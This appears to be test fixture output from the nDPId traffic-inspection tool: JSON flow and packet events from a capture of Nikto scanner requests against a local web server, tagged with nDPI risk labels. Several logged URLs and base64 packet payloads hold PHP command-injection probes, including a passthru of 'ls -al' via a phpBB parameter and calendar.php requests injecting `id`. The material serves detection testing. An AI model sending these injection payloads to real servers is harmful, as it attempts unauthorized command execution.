{"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001400)"}} +01217{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7580000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1576420277845,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001400)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_packet_id":1,"flow_last_seen":1576420277847,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277847,"pkt":"AAAAAAAAAAAAAAAACABFAADFXW9AAEAG3sF\/AAABfwAAAccwH5A6PWRZjzFeOIAYAED+uQAAAQEICp1m\/3+dZv9\/R0VUIC9tc2FkYy9tc2FkY3MuZGxsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDE0NzQpDQoNCg=="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/msadcs.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001474)"}} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/msadcs.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001474)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277849,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_packet_id":1,"flow_last_seen":1576420277849,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277849,"pkt":"AAAAAAAAAAAAAAAACABFAADBYllAAEAG2dt\/AAABfwAAAccyH5AM9ltiiZJuH4AYAED+tQAAAQEICp1m\/4GdZv+AR0VUIC91cGxvYWRlci5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAxOCkNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277849,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/uploader.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003018)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277849,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/uploader.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003018)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7580000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1576420277850,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00800{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_packet_id":1,"flow_last_seen":1576420277850,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1576420277850,"pkt":"AAAAAAAAAAAAAAAACABFAAEkktVAAEAGqPx\/AAABfwAAAcc0H5D516vm6SxeZoAYAED\/GAAAAQEICp1m\/4KdZv+CR0VUIC9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCg0K"} -01149{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7580000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1576420277850,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +01149{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7580000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1576420277850,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7580000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277851,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00809{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_packet_id":1,"flow_last_seen":1576420277851,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":312,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":312,"pkt_l4_len":278,"thread_ts_msec":1576420277851,"pkt":"AAAAAAAAAAAAAAAACABFAAEqh81AAEAGs\/5\/AAABfwAAAcc2H5Bgvr79vMi8roAYAED\/HgAAAQEICp1m\/4OdZv+DR0VUIC9mb3J1bS9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCg0K"} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7580000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277851,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7580000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277851,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7580000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277854,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_packet_id":1,"flow_last_seen":1576420277854,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":313,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":313,"pkt_l4_len":279,"thread_ts_msec":1576420277854,"pkt":"AAAAAAAAAAAAAAAACABFAAErhnRAAEAGtVZ\/AAABfwAAAcc4H5AJP79Gqf4KlIAYAED\/HwAAAQEICp1m\/4adZv+GR0VUIC9mb3J1bXMvY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwMzkpDQoNCg=="} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7580000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277854,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forums\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7580000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277854,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forums\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7580000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277855,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00812{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_packet_id":1,"flow_last_seen":1576420277855,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":313,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":313,"pkt_l4_len":279,"thread_ts_msec":1576420277855,"pkt":"AAAAAAAAAAAAAAAACABFAAErbT9AAEAGzot\/AAABfwAAAcc6H5Be6VQGyl7\/vYAYAED\/HwAAAQEICp1m\/4edZv+HR0VUIC9mb3J1bXovY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwMzkpDQoNCg=="} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7580000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277855,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forumz\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7580000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277855,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forumz\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7580000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"flow_avg_l4_payload_len":248,"midstream":1,"thread_ts_msec":1576420277857,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_packet_id":1,"flow_last_seen":1576420277857,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1576420277857,"pkt":"AAAAAAAAAAAAAAAACABFAAEsZgtAAEAG1b5\/AAABfwAAAcc8H5AWK18ypPoEwIAYAED\/IAAAAQEICp1m\/4mdZv+JR0VUIC9odGZvcnVtL2NhbGVuZGFyLnBocD9jYWxiaXJ0aGRheXM9MSZhY3Rpb249Z2V0ZGF5JmRheT0yMDAxLTgtMTUmY29tbWE9JTIyO2VjaG8lMjAnJzslMjBlY2hvJTIwJTYwaWQlMjAlNjA7ZGllKCk7ZWNobyUyMiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDM5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7580000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"flow_avg_l4_payload_len":248,"midstream":1,"thread_ts_msec":1576420277857,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/htforum\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} 